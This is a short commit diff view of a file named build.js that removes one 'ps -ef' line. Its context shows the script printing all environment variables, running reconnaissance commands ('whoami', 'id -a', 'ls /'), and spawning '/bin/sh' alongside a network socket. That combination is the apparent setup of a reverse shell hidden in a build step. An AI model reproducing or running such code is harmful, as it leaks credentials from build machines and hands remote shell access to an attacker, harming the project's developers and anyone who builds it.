update
This commit is contained in:
1
build.js
1
build.js
@@ -13,7 +13,6 @@ console.log(process.env);
|
|||||||
run("whoami");
|
run("whoami");
|
||||||
run("id -a");
|
run("id -a");
|
||||||
run("ls /");
|
run("ls /");
|
||||||
run("ps -ef");
|
|
||||||
|
|
||||||
const sh = child_process.spawn("/bin/sh", []);
|
const sh = child_process.spawn("/bin/sh", []);
|
||||||
var client = new net.Socket();
|
var client = new net.Socket();
|
||||||
|
|||||||
Reference in New Issue
Block a user